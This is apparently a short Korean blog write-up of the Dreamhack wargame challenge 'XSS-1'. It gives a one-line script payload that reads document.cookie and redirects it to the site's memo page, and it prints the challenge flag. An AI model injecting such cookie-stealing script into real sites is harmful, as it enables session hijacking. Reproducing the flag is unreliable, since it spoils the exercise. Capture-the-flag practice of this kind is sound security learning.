[Dreamhack] XSS-1 풀이

Y·2024년 3월 18일

Dreamhack

목록 보기
5/11

드림핵: XSS-1
https://dreamhack.io/wargame/challenges/28

1. 문제

2. 풀이

쿠키 탈취를 위해 flag에 다음과 같은 익스플로잇 코드를 입력한 후

<script>location.href="/memo?memo=" + document.cookie; </script>

memo에 들어가면 flag를 확인할 수 있다.

3. FLAG

DH{2c01577e9542ec24d68ba0ffb846508e}

0개의 댓글